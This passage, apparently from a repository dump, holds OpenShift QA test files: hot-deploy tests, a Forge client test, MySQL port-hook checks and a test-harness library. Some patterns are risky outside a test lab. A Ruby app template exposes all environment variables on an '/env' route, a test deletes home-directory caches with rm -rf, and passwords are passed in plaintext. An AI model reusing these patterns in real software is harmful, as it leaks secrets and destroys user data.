testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CdiApplicationSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7075605988502502, "alphanum_fraction": 0.7218259572982788, "avg_line_length": 24.035715103149414, "blob_id": "668e30ea637b7c091d14915b1e8a35a9b52d6fc7", "content_id": "0d1d5584ce80fad52b5e8538f751c2d6fac87dba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 701, "license_type": "no_license", "max_line_length": 93, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nOct 23, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass EWSHotDeployWithoutJenkins(JBossHotDeployWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.application_type = 
common.app_types['jbossews']\n self.config.summary = \"[US2513] Hot deployment support for JBossEWS- without Jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.683068037033081, "alphanum_fraction": 0.7178003191947937, "avg_line_length": 23.678571701049805, "blob_id": "791b3351052054e69486e37018020670948a541c", "content_id": "e0fc3308e9245fde4b219d5f644b33cb1b9039e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 104, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby19_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 28, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby19_without_jenkins import Ruby19HotDeployWithoutJenkins\n\nclass Ruby19HotDeployWithJenkins(Ruby19HotDeployWithoutJenkins):\n def __init__(self, config):\n Ruby19HotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2443]Hot deployment support for application - with Jenkins - ruby-1.9\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby19HotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6047988533973694, "alphanum_fraction": 0.6330274939537048, "avg_line_length": 22.213115692138672, "blob_id": "33835b5cf309977af5c2b2ccff1bbdfb4cd60a31", "content_id": "72ce4d73ce55b93eebde40e8b3ff8a4b5a1b2c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1417, "license_type": "no_license", "max_line_length": 124, "num_lines": 61, "path": "/automation/open/testmodules/UI/web/case_138790.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138790.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_Long_domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create duplicate domain\n web.go_to_account_page()\n time.sleep(10)\n web.click_element_by_link_text(\"Change your namespace...\")\n time.sleep(5)\n web.clear_element_value(\"domain_name\")\n web.input_by_id(\"domain_name\", \"QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ\") \n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath(\"Namespace is too long. 
Maximum length is 16 characters.\", '''//form/ul/li''') \n\n self.tearDown()\n\n return self.passed(\"Case 138790 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_Long_domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138790.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6718061566352844, "alphanum_fraction": 0.6938325762748718, "avg_line_length": 25.705883026123047, "blob_id": "be25f36ada92cd9c086b9205b32e9742fb1b03a3", "content_id": "ee82ad826978b834ef04627da0f8df692ee34138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "no_license", "max_line_length": 58, "num_lines": 17, "path": "/automation/open/bin/rhtest", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path1 = os.path.abspath(file_path + \"/../lib\")\nlib_path2 = lib_path1 + \"/supports\"\nlib_path3 = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path1)\nsys.path.append(lib_path2)\nsys.path.append(lib_path3)\nimport rhtestrunner\n\nrv = rhtestrunner.runtest(sys.argv)\nif int(rv) == 1: #PASSED\n sys.exit(0)\nelse:\n sys.exit(1+int(rv))\n" }, { "alpha_fraction": 0.6034536957740784, "alphanum_fraction": 0.6162998676300049, "avg_line_length": 26.685131072998047, "blob_id": "a8754e0880c6580c2e138ed87f559eb32eee3a40", "content_id": "4ea6aee0d6b593d644e7274685ce4cec2200ac7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9497, "license_type": "no_license", "max_line_length": 181, "num_lines": 343, "path": "/automation/open/testmodules/RT/cartridge/forge_java_client_tools.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: forge_java_client_tools.py\n# Date: 2012/02/27 08:56\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport rhtest\nimport testcase, common, OSConf, pexpect\n\n#TODO: get the version from TCMS arguments\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary= \"[US1413][UI] Change SeamForge plugin to use the official Java client tools\"\n self.app_name = 'forgeapp'\n tcms_testcase_id = 121961\n\n try:\n #TODO: this could be received from framework\n self.forge_version = os.environ[\"forge_version\"]\n except:\n self.forge_version = '1.0.0.Final'\n #forge_version = '1.0.0.Beta3'\n\n common.env_setup()\n\n forge_dir = \"%s/forge/\"%os.getcwd()\n os.environ['FORGE_HOME'] = forge_dir\n os.environ['PATH'] += \":%s/bin\"%forge_dir\n\n def finalize(self):\n os.system(\"rm -rf forge-*; rm -rf forge; rm -rf %s\"%self.app_name )\n\nclass ForgeJavaClient(OpenShiftTest):\n def test_method(self):\n steps = []\n steps.append(testcase.TestCaseStep(\"Check Java/Expect/Maven3 version\" ,\n \"java -version 2>&1|grep OpenJDK && javac -version 2>&1 | grep 1.6 && expect -version && mvn -version |grep 'Apache Maven 3' && echo PASS\",\n expect_string_list = [\"PASS\"],\n expect_description = \"Javac/Expect/Maven3 should be installed\",\n expect_return=0))\n\n steps.append(testcase.TestCaseStep(\"Check if domain 
exists\",\n 'rhc-domain-info -l %s -p %s'%(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd),\n unexpect_string_list=[\"A user with rhlogin '%s' does not have a registered domain.\"%self.config.OPENSHIFT_user_email],\n expect_return=0))\n\n steps.append(testcase.TestCaseStep(\"Install JbossForge\",\n '''\n rm -rf $HOME/.m2 &&\n rm -rf $HOME/.forge &&\n wget 'https://repository.jboss.org/nexus/service/local/artifact/maven/redirect?r=releases&g=org.jboss.forge&a=forge-distribution&v=%s&e=zip' -O forge-package.zip &&\n unzip forge-package.zip &&\n rm -f forge-package.zip &&\n ln -s forge-* forge \n '''%(self.forge_version),\n expect_return=0,\n expect_description=\"JbossForge Installation should pass\"))\n\n steps.append(testcase.TestCaseStep(\"Run basic jboss tools commands commands\", \n self.check_jboss_forge,\n expect_return = 0,\n expect_description = \"All of the JBossForge commands should pass\"))\n\n steps.append(testcase.TestCaseStep(\"Destroy that application\", \n common.destroy_app,\n function_parameters = [self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = \"The application should not exist\",\n expect_return=\"!0\"))\n\n case = testcase.TestCase(self.summary, steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def check_jboss_forge(self):\n expect_file = 'forge.expect'\n f = open(expect_file, 'w')\n\n f.write('''#!/usr/bin/expect --\n#it seems that colors in shell makes problems with matching\n#so, what you see is not what is in the buffer\n\nset app_name %s\nset username %s\nset password %s\n\nset send_slow {10 .001}\nset send_human {.1 .3 1 .05 2}\nproc dprint {msg} {\n send_user \"\\\\nDEBUG: $msg\\\\n\"\n}\n\nproc abort {msg} {\n send \"exit\\\\n\"\n send_user \"ABORT() $msg\\\\n\"\n exit 254\n}\n\nspawn forge/bin/forge\n\nexpect {\n -timeout 180\n \"no project*\\$*\" { dprint \"OK: found initial prompt\" }\n timeout { abort \"timeout: No initial prompt.\"}\n}\n#\n# forge list-plugins\n#\nsend \"forge list-plugins\\\\n\"\nexpect {\n -timeout 20\n \"no project*\\$*\" { dprint \"OK: forge list-plugins\"}\n timeout { abort \"Unable to execute forge list-plugins command\" }\n}\n\n#\n# new -project\n#\nsend \"new-project --named forge-openshift-demo --topLevelPackage org.jboss.forge.openshift\\\\n\"\nexpect {\n \"Use*as project directory*\" { send \"Y\\\\n\" }\n}\nexpect {\n -timeout 30 \n \"SUCCESS*\" { dprint \"OK: new-project\" }\n timeout {abort \"timeout: new-project ...\"}\n}\nexpect {\n -timeout 60 \n \"forge-openshift-demo*forge-openshift-demo*\\$*\" { dprint \"OK: CLI\" }\n timeout {abort \"timeout: no prompt after new-project\"}\n}\nexpect * ;#clean the buffer\n#\n# forge install plugin\n#\nsend \"forge install-plugin openshift-express\\\\n\"\nexpect {\n -timeout 900\n \"BUILD SUCCESS*\\\\n\" { dprint \"OK: BUILD SUCCESS\" }\n timeout {abort \"timeout: BUILD SUCCESS\"}\n}\nexpect {\n -timeout 20 \n \"SUCCESS*Installed from\" { dprint \"OK: Installed from\"}\n timeout { abort \"timeout: Installed from\" }\n}\nexpect {\n -timeout 20 \n \"forge-openshift-demo*forge-openshift-demo*\\$*\" { dprint \"OK: Installation done.\"}\n timeout { abort \"timeout: End of installation\" }\n}\nexpect * ;#clean the buffer\nsend 
\"\\\\n\"\nsend \"\\\\n\"\nexpect {\n \"forge-openshift-demo*forge-openshift-demo*\\$*\"\n}\nsleep 5\n#\n# rhc-expect setup\n#\nsend -s \"rhc-express setup --app $app_name \\\\n\"\nexpect {\n \"Enter your Red Hat Login\" {send -s \"$username\\\\n\"}\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n}\nsleep 5\nexpect {\n -timeout 180 \n \"Initialized empty*\" { dprint \"OK: password sent\"}\n \"ERROR*\" { abort \"Something wrong with password\" }\n \"Caused by: *\" { abort \"Something wrong with password\" }\n #timeout { abort \"timeout:Waiting for password prompt\"}\n}\nexpect {\n -timeout 3000 \n \"SUCCESS*Installed*successfully\" { dprint \"OK: Installation of $app_name - success\" }\n \"Caused by: *\" { abort \"Some Exception ?\" }\n timeout { abort \"timeout:Waiting for successful setup is never ending...\"}\n}\n\nexpect * ;#clean the buffer\n\n#\n# servlet setup\n#\nsend -s \"servlet setup\\\\n\"\nexpect {\n -timeout 20\n \"Facet*requires packaging*\" { send \"Y\\\\n\" }\n timeout { abort \"???\" } \n}\nexpect {\n -timeout 60\n \"SUCCESS*Installed*successfully\" { dprint \"OK: Installed successfully\" }\n timeout { abort \"???\" } \n}\nexpect {\n -timeout 60\n \"SUCCESS*Servlet is installed\" { dprint \"OK: Servlet is installed\" }\n timeout { abort \"Unable to install servlet\" } \n}\nexpect {\n -timeout 60\n \"SUCCESS*Servlet is installed\\n\"\n timeout { abort \"Unable to install servlet support.\" } \n}\n#\n# git add ...\n#\nsend -s \"git add pom.xml src/\\\\n\"\nexpect {\n -timeout 90\n \"forge-openshift-demo*forge-openshift-demo*\\$*\" {dprint \"Git add \"}\n timeout {abort \"??\" }\n}\nsend -s \"rhc-express deploy\\\\n\"\nexpect {\n -timeout 90\n \"remote: Starting application\" {dprint \"Starting application\"}\n timeout { abort \"No CLI after rhc-express deploy\" }\n}\n\n#\n# rhc-express status\n#\nsend -s \"rhc-express status\\\\n\"\nexpect {\n -timeout 60\n \"Enter your Red Hat Login*\" {send -s \"$username\\\\n\"}\n timeout {abort \"No Red Hat Login prompt\" }\n}\nsleep 5\nexpect {\n \"Enter the application name\" {send -s \"$app_name\\\\n\"}\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n timeout { abort \"No password prompt\"}\n}\nsleep 5\nexpect {\n -timeout 280 \n \"forge-openshift-demo*forge-openshift-demo*\\$*\" {dprint \"OK\"}\n}\nexpect * ; #clean the buffer\n#\n# rhc-express list\n#\nsend -s \"rhc-express list\\\\n\"\nexpect {\n -timeout 60\n \"Enter your Red Hat Login*\" {send -s \"$username\\\\n\"}\n timeout {abort \"No Red Hat Login prompt\" }\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n timeout { abort \"No password prompt\"}\n}\nexpect {\n -timeout 30\n \"Applications on OpenShift Express\" {dprint \"List - OK\"}\n timeout { abort \"No password prompt\"}\n}\nexpect *;\nsleep 5\n#\n# rhc-express destroy\n#\nsend -s \"rhc-express destroy\\\\n\"\nexpect {\n -timeout 60\n \"Enter your Red Hat Login*\" {send -s \"$username\\\\n\"}\n timeout {abort \"No Red Hat Login prompt\" }\n}\nsleep 5\nexpect {\n \"Enter the application name\" {send -s \"$app_name\\\\n\"}\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n timeout { abort \"No password prompt\"}\n}\nsleep 5\nexpect {\n -timeout 30\n \"About to destroy application\" { send -s \"Y\\\\n\" }\n timeout { abort \"No destroy prompt\"}\n}\nexpect {\n -timeout 90\n \"Destroyed application $app_name on\" { dprint \"Deleted.\" }\n timeout { abort 
\"Unable to destroy application\" }\n}\n\nsend -s \"exit\\\\n\"\nclose\nexit 0 '''%(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd))\n f.close()\n (status, output) = common.command_getstatusoutput(\"chmod +x %s;./%s\"%(expect_file,expect_file))\n return status\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ForgeJavaClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of forge_java_client_tools.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5800807476043701, "alphanum_fraction": 0.5989232659339905, "avg_line_length": 19.63888931274414, "blob_id": "1ee77b9700f05015bdb5422c16b58eddbee86769", "content_id": "1f6006102853e49428ddf580426bfc9107fdafda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 743, "license_type": "no_license", "max_line_length": 133, "num_lines": 36, "path": "/automation/open/testmodules/RT/cartridge/app_template/universal/ruby/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'rack/lobster'\nif RUBY_VERSION.include?(\"1.8.\")\n require 'thread-dump'\nelsif RUBY_VERSION.include?(\"1.9.\")\n require './thread-dumper'\nend\nrequire 'mysql'\n\nmap '/health' do\n health = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"1\"]]\n end\n run health\nend\n\nmap '/lobster' do\n run Rack::Lobster.new\nend\n\nmap '/' do\n welcome = proc do |env|\n [200, { \"Content-Type\" => \"text/plain\" }, [\"Usage: #{ENV['OPENSHIFT_APP_DNS']}/<group>\\nValid groups are 'shell','env','mysql'\"]]\n end\n run welcome\nend\n\nmap '/env' do\n env = proc do |env|\n result = String.new\n ENV.to_hash.each do |key, value|\n result << \"#{key}=#{value}\\n\"\n end\n [200, { \"Content-Type\" => \"text/plain\" }, [result]]\n end\n run env\nend\n" }, { "alpha_fraction": 0.482445627450943, "alphanum_fraction": 0.4874122142791748, "avg_line_length": 38.452701568603516, "blob_id": "6d5f4338bc7fd8f84a0bbe4c7248ce91c9e23130", "content_id": "a79deb3006a2e78f4459a030fabc5566818f0fd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5839, "license_type": "no_license", "max_line_length": 177, "num_lines": 148, "path": "/automation/open/testmodules/RT/client/expose_conceal_port_hooks.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import common\nimport OSConf\nimport rhtest\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.info(\"[US1909][BI]Horizontal Scale: Expose/Conceal port hooks\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n self.key_filename = common.getRandomString(7)\n self.new_keyname = common.getRandomString(7)\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n self.proxy_port = None\n self.proxy_host = None\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass ExposeConcealPortHooks(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, \n True])\n\n self.add_step(\"Emebed mysql\",\n common.embed,\n function_parameters=[self.app_name, \n 
'add-%s'%common.cartridge_types['mysql'], \n self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Run exposed hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"expose-port\", \n \"PROXY_PORT=\\d+\"],\n expect_return=0)\n\n self.add_step(\"Run conceal hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"conceal-port\", \n None, 0],\n expect_return=0)\n\n self.add_step(\"Check MYSQL connection to PROXY_HOST:PROXY_PORT\",\n self.verify_proxy_port,\n function_parameters=[self.app_name],\n expect_description = \"Mysql to proxy should fail\",\n expect_return=\"!0\")\n\n self.add_step(\"Run show hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"show-port\", \n r\"CLIENT_RESULT: No proxy ports defined\", 0],\n expect_return=0)\n\n self.add_step(\"Run exposed hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"expose-port\", \n \"PROXY_PORT=\\d+\"],\n expect_return=0)\n\n self.add_step(\"Run show hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"show-port\", \n \"PROXY_PORT=\\d+\"],\n expect_return=0)\n\n self.add_step(\"Check MYSQL connection to PROXY_HOST:PROXY_PORT\",\n self.verify_proxy_port,\n function_parameters=[self.app_name],\n expect_description = \"Mysql to proxy should pass\",\n expect_return=0)\n\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def verify_proxy_port(self, app_name):\n if (self.proxy_host==None or self.proxy_port==None):\n print \"ERROR: Unable to capture PROXY_PORT/PROXY_HOST from rhc ctl app -c show-port output\"\n return 1\n\n cart = OSConf.get_apps()[app_name]['embed'][common.cartridge_types['mysql']]\n cmd=\"echo 'SHOW TABLES' | mysql --host=%s --port=%s --user=%s --password=%s %s \"%(self.proxy_host, self.proxy_port, cart['username'], cart['password'], cart['database'])\n (status, output) = common.run_remote_cmd(app_name, cmd)\n return status\n\n def verify(self, app_name, hook_name, expected_re=None, expected_return=None):\n uuid = OSConf.get_app_uuid(app_name)\n cmd = '''cd /usr/libexec/openshift/cartridges/embedded/%s/info/hooks && ./%s %s %s %s '''%(common.cartridge_types['mysql'], hook_name, app_name, self.domain_name, uuid)\n (status, output) = common.run_remote_cmd(None, cmd, as_root=True)\n #this is stronger condition\n if (expected_re!=None):\n obj = re.search(r\"%s\"%expected_re, output)\n if obj:\n if (hook_name=='expose-port'):\n obj = re.search(r\"PROXY_HOST=(.*)\",output)\n obj2 = re.search(r\"PROXY_PORT=(.*)\",output)\n if (obj and obj2):\n self.proxy_host = obj.group(1)\n self.proxy_port = obj2.group(1)\n else:\n print \"WARNING: Unable to capture PROXY_HOST from output...\"\n return 0\n else:\n return 1\n\n if (expected_return!=None):\n if status==expected_return:\n return 0\n else:\n return 1\n print \"WARNING: Nothing to verify?\"\n return 1\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ExposeConcealPortHooks)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.641791045665741, "alphanum_fraction": 0.6447761058807373, "avg_line_length": 29.454545974731445, "blob_id": "d4f82ffb6dfa594abb0caf4abe4a1d2aaa825e67", "content_id": "2f09df11f645320990789f9adadaa87f6bb58ce6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, 
"license_type": "no_license", "max_line_length": 87, "num_lines": 11, "path": "/listenertest/ShowVariable.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import tkMessageBox\nfrom Tkinter import Tk\nfrom robot.libraries.BuiltIn import BuiltIn\n \n \nROBOT_LISTENER_API_VERSION = 2\n \ndef end_test(name, attributes):\n Tk().withdraw() # Remove root window\n tkMessageBox.showinfo(\"Please click 'OK'...\",\n \"test_var = '%s'\" % BuiltIn().get_variables()['${test_var}'])\n" }, { "alpha_fraction": 0.5459363460540771, "alphanum_fraction": 0.5486295223236084, "avg_line_length": 39.669612884521484, "blob_id": "22582d22e80322b250d4a3aac66c850d9b142895", "content_id": "f888ff59aa1a6261e5b5ce94c7b2753160d57e76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23021, "license_type": "no_license", "max_line_length": 377, "num_lines": 566, "path": "/automation/open/lib/testcase.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport re\nimport time\nimport sys\nimport inspect\nimport subprocess\nimport os\nimport signal\nfrom helper import TimeoutError, Alarm, _alarm_handler, COMMAND_TIMEOUT, cmd_get_status_output\n# test By default, already have one element to occupy 0 index, so that steps' output will be saved from 1 index\n# Every element in this list should be string.\n__OUTPUT__ = [None]\n__PARSED_VARS__ = {}\n# parameters eval only occurs in TestCase instance, not in TestCaseStep instance\n__EVAL_FLAG__ = False\n\n\ndef repl(matchobj):\n #global __OUTPUT__\n if matchobj != None:\n print '''Found '__OUTPUT__|__PARSED_VARS__' keyword, replace it'''\n return eval(matchobj.group(0))\n\ndef eval_parameters_list(parameters_list):\n #global __OUTPUT__\n print '''Eval parameters of string type...'''\n temp = []\n for parameter in parameters_list:\n if isinstance(parameter, str):\n re_match_obj = re.match(r\"^__OUTPUT__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", repl, parameter)\n #__PARSED_VARS__\n re_match_obj = re.match(r\"^__PARSED_VARS__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", repl, parameter)\n else:\n pass\n temp.append(parameter)\n return temp\n\n\ndef run_function(function_name, parameters_list):\n #global __OUTPUT__\n print \"\\nFunction is running ...\"\n #apply is deprecated since version 2.3, http://docs.python.org/library/functions.html#apply\n #retcode = apply(self.cmd, self.parameters)\n retcode = function_name(*parameters_list)\n print \"\\nFunction Return:\", retcode\n # Function's output will not be captured, so set it to \"Fun_None_Output\"\n return (retcode, \"Fun_None_Output\")\n\n\ndef eval_command_string(command_line):\n print '''Evaluting command string...'''\n cmd_after_eval = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", repl, command_line)\n cmd_after_eval = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", repl, cmd_after_eval)\n return cmd_after_eval\n\n\n\ndef run_command(command):\n return cmd_get_status_output(command)\n\n\ndef check_ret(real_ret, expect_ret):\n if not isinstance(real_ret, list) and isinstance(expect_ret, str) and re.match(\"^!\",expect_ret):\n real_expect_ret = int(expect_ret.replace('!',''))\n if real_ret != real_expect_ret:\n print \"Return %s, Expect %s - [PASS]\" %(real_ret, expect_ret)\n return 
True\n else:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret, expect_ret)\n return False\n elif (isinstance(real_ret, list) or isinstance(real_ret, tuple)) and not (isinstance(expect_ret, tuple) or isinstance(expect_ret, list)): \n #case when the list is returned from function...\n #will check only the first item in the list\n if len(real_ret)>0 and real_ret[0] == expect_ret:\n print \"Return %s, Expect %s - [PASS]\" %(real_ret[0], expect_ret)\n return True\n else:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret[0], expect_ret)\n return False\n elif (isinstance(real_ret, list) or isinstance(real_ret, tuple)) and (isinstance(expect_ret, list) or isinstance(expect_ret, tuple)):\n #case when the list is returned from function\n #also expected value is list\n if len(real_ret) != len(expect_ret):\n return False\n\n for i in real_ret:\n if real_ret[i] != expect_ret[i]:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret[i], expect_ret[i])\n return False\n print \"Return %s, Expect %s - [PASS]\" %(real_ret, expect_ret)\n return True\n elif real_ret == expect_ret:\n print \"Return %s, Expect %s - [PASS]\" %(real_ret, expect_ret)\n return True\n else:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret, expect_ret)\n return False\n\n\ndef check_output(output, expect_str_reg_list, ex_re_ignore_case, unexpect_str_reg_list, unex_re_ignore_case):\n if ex_re_ignore_case:\n print \"re.I flag is trun on for expect string matching\"\n ex_re_flag = re.M | re.I\n else:\n ex_re_flag = re.M\n for reg in expect_str_reg_list:\n search_obj = re.search(r'''%s'''%(reg), output, ex_re_flag)\n if search_obj != None:\n print \"According to [%s] regular express, find out expected string: [%s] - [PASS]\" %(reg, search_obj.group(0))\n else:\n print \"According to [%s] regular express, no expected string is found out - [FAIL]\" %(reg)\n return False\n\n if unex_re_ignore_case:\n print \"re.I flag is trun on for unexpect string matching\"\n unex_re_flag = re.M | re.I\n else:\n unex_re_flag = re.M\n for reg in unexpect_str_reg_list:\n search_obj = re.search(r'''%s'''%(reg), output, unex_re_flag)\n if search_obj != None:\n print \"According to [%s] regular express, find out unexpected string: [%s] - [FAIL]\" %(reg, search_obj.group(0))\n return False\n else:\n print \"According to [%s] regular express, no unexpected string is found out - [PASS]\" %(reg)\n\n return True\n\n\ndef filter_output(output, filter_reg):\n if filter_reg != None:\n search_obj = re.search(r\"%s\" %(filter_reg), output, re.M)\n if search_obj != None:\n ret_output = search_obj.group(0)\n print \"According to output filter - [%s], return [%s]\" %(filter_reg, ret_output)\n else:\n ret_output = \"\"\n print \"According to output filter - [%s], return empty string\" %(filter_reg)\n else:\n ret_output = output\n return ret_output\n\n\ndef run(command, function_parameters):\n if isinstance(command, str):\n print '''Command: %s''' %(command)\n if __EVAL_FLAG__:\n command = eval_command_string(command)\n print '''Command after evalute: %s\\n''' %(command)\n (retcode, output) = run_command(command)\n elif inspect.isfunction(command):\n print '''Function: %s''' %(command)\n print '''Parameters: %s''' %(function_parameters)\n\n #\n # let's try to exec functions/closeures if present\n #\n l_params = []\n for p in function_parameters:\n if inspect.isfunction(p) or inspect.ismethod(p):\n print '''INFO: Execute %s parameter as function'''%p\n res = p()\n l_params.append(res)\n else:\n l_params.append(p)\n\n function_parameters = l_params\n print 
'''Parameters: %s''' %(function_parameters)\n if __EVAL_FLAG__:\n function_parameters = eval_parameters_list(function_parameters)\n print '''Parameters after evalute: %s\\n''' %(function_parameters)\n (retcode, output) = run_function(command, function_parameters)\n else:\n print \"Unknow command type !!!\"\n return 254\n\n return (retcode, output)\n\n\n\n\nclass TestCase():\n\n def __init__(self, summary, steps=[], clean_up_command=None, clean_up_function_parameters=[], testcase_id=None):\n if not isinstance(steps, list):\n print \"Parameter Error: list type is expected for steps option, e.g: [{'description': <value>, 'command': <value>}, TestCaseStep_Object]\"\n sys.exit(99)\n if not isinstance(summary, str):\n print \"Parameter Error: str type is expected for summary option\"\n sys.exit(99)\n\n self.summary = summary\n self.TestCaseStep_Obj_list = []\n self.count = 0\n self.Step_Output_List = []\n self.__clean_up_cmd = clean_up_command\n self.__clean_up_fun_parameters = 